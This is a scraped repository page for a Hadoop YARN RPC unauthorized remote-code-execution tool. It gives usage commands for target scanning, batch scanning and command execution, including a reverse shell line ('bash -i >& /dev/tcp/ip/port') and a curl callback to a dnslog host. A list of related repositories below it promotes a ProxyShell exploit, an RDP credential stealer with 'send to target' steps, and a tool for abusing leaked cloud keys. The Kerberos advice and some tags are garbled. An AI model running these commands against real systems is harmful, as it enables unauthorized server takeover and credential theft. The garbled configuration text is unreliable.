Hadoop Yan RPC unauthorized RCE

Related tags

Security related resourceshadoop-yan-rpc-unauthorized-rce
Overview

Vuln Impact

On November 15, 2021, A security researcher disclosed that there was an unauthorized access vulnerability in Hadoop yarn RPC. This vulnerability existed in Hadoop yarn, the core component of Hadoop. Because Hadoop yarn opened the RPC service to the public by default, a remote attacker could take advantage of this unauthorized vulnerability and execute arbitrary commands through the RPC service, so as to control the target server, In view of the high-risk status and great harm of this vulnerability, and the details have been disclosed and exploited by the opposition, it is recommended that all users using Apache Hadoop conduct self-examination and take security measures in time.

Vuln Product

Apache Hadoop Yarn *

Vunl Check

Basic usage

python3 Hadoop_Yan_RPC_RCE.py

img

Vuln check

python3 Hadoop_Yan_RPC_RCE.py -v true -t http://www.target.com

img

command execute

python3 Hadoop_Yan_RPC_RCE.py -a true -t http://www.target.com  -c "curl xxx.dnslog.cn"

attack

dnslog

batch scan

python3 Hadoop_Yan_RPC_RCE.py -s true -f target.txt

scan_result

Reserve Shell

& /dev/tcp/ip/port 0>&1" "> 
python3 Hadoop_Yan_RPC_RCE.py -a true -t http://www.target.com -c "bash -i >& /dev/tcp/ip/port 0>&1"

reverse_shell1

Reference

https://nosec.org/home/detail/4905.html

https://github.com/N0b1ta/Bit-Cannon/tree/master/Apache/Hadoop/YARN/hadoop-yarn-rest-api-unauth

Safety Advice

1.Enable Kerberos authentication to prevent unauthorized access.

<property>
    <name>hadoop.security.authenticationname>
    <value>kerberosvalue>
    <final>falsefinal>
    <source>core-site.xmlsource>
property>...
<property>
    <name>hadoop.rpc.protectionname>
    <value>authenticationvalue>
    <final>falsefinal>
    <source>core-default.xmlsource>
property>

2.Prohibit external addresses from accessing Hadoop RPC service related ports or configured to be open only to trusted addresses.

Solemnly declare: Don't use this tool for illegal operation. This tool is only used for safety self checking by Party A's personnel and Party B's personnel.If the user uses it illegally, the legal responsibility shall be borne by the user!!!.

Owner
Al1ex
Al1ex
GitHub Repository
Automatic SQL injection and database takeover tool

sqlmap sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of

sqlmapproject 25.7k Jan 08, 2023
script that pulls cve collections from NVD.NIST.GOV.

# cvepull.py #script that pulls cve collections from NVD.NIST.GOV. #edit line 17 (timedelta) number to change the amount of days to search backwards

Aaron W 1 Dec 18, 2021
IDA scripts for hypervisor (Hyper-v) analysis and reverse engineering automation

Re-Scripts IA32-VMX-Helper (IDA-Script) IA32-MSR-Decoder (IDA-Script) IA32 VMX Helper It's an IDA script (Updated IA32 MSR Decoder) which helps you to

Behrooz Abbassi 16 Oct 08, 2022
A small script to export all AWAF policies from a BIG-IP device

This script leverages BIG-IP iControl REST API to export ALL AWAF policies in the system and saves them locally. The policies can be exported in the following formats: xml, plc and json.

3 Feb 03, 2022
Nmap scanner with python

Nmap_scanner Usage: sudo python3 nmap_ping.py -i Network List.txt -o Output Folder Location Program can Run Ping Scan Run Port Scan Run Nmap Vuln

Arshaad Mohiadeen 3 Apr 13, 2022
Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading

log4j-detect Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading The script

Wade 1 Dec 15, 2021
Tinyman exploit finder - Tinyman exploit finder for python

tinyman_exploit_finder There was a big tinyman exploit. You can read about it he

fish.exe 9 Dec 27, 2022
Malware Configuration And Payload Extraction

CAPE: Malware Configuration And Payload Extraction CAPE is a malware sandbox. It is derived from Cuckoo and is designed to automate the process of mal

Kevin O'Reilly 1k Dec 30, 2022
Python & JavaScript Obfuscator made in Python 3.

Python Code Obfuscator A script that converts code into full on random numerical expressions. Simple Scripts: Python Mode... Input: Function that deco

rzx. 1 Dec 29, 2021
Anti Supercookie - Confusing the ISP & Escaping the Supercookie

Confusing the ISP & Escaping the Supercookie

Baris Dincer 2 Nov 22, 2022
Docker Compose based system for running remote browsers (including Flash and Java support) connected to web archives

pywb Remote Browsers This repository provides a simple configuration for deploying any pywb with remote browsers provided by OWT/Shepherd Remote Brows

Webrecorder 10 Jul 28, 2022
Security offerings for AWS Control Tower

Caylent Security Catalyst Reference Architecture Examples This repository contains solutions for Caylent's Security Catalyst. The Security Catalyst is

Steven Connolly 1 Oct 22, 2021
A tool that detects the expensive Carbon Black watchlists.

A tool that detects the "expensive" Carbon Black watchlists.

Oğuzcan Pamuk 8 Aug 04, 2022
A kAFL based hypervisor fuzzer which fully supports nested VMs

hAFL2 hAFL2 is a kAFL-based hypervisor fuzzer. It is the first open-source fuzzer which is able to target hypervisors natively (including Hyper-V), as

SafeBreach Labs 115 Dec 07, 2022
ProxyShell POC Exploit : Exchange Server RCE (ACL Bypass + EoP + Arbitrary File Write)

ProxyShell Install git clone https://github.com/ktecv2000/ProxyShell cd ProxyShell virtualenv -p $(which python3) venv source venv/bin/activate pip3 i

Poming huang 312 Dec 09, 2022
RDP Stealer

RDP Stealer RDP Stealer by lamp Require Python How To Use Download This Source Extract The Zip File Change webhook url Convert to exe send to target I

Lamp 14 Nov 26, 2022
Patching - Interactive Binary Patching for IDA Pro

Patching - Interactive Binary Patching for IDA Pro Overview Patching assembly code to change the behavior of an existing program is not uncommon in ma

589 Dec 30, 2022
DomainMonitor is a web project that has a RESTful API to get a domain's subdomains and whois data.

DomainMonitor is a web project that has a RESTful API to get a domain's subdomains and whois data.

2 Feb 05, 2022
Confluence Server Webwork OGNL injection

CVE-2021-26084 - Confluence Server Webwork OGNL injection An OGNL injection vulnerability exists that would allow an authenticated user and in some in

Fellipe Oliveira 295 Jan 06, 2023
阿里云accesskey利用工具

aliyun-accesskey-Tools 此工具用于查询ALIYUN_ACCESSKEY的主机,并且远程执行命令。 对于ALIYUN_ACCESSKEY利用方式可参考文章:记一次阿里云主机泄露Access Key到Getshell 工具截图 安装模块 pip install -r require

一灯老和尚 826 Jan 01, 2023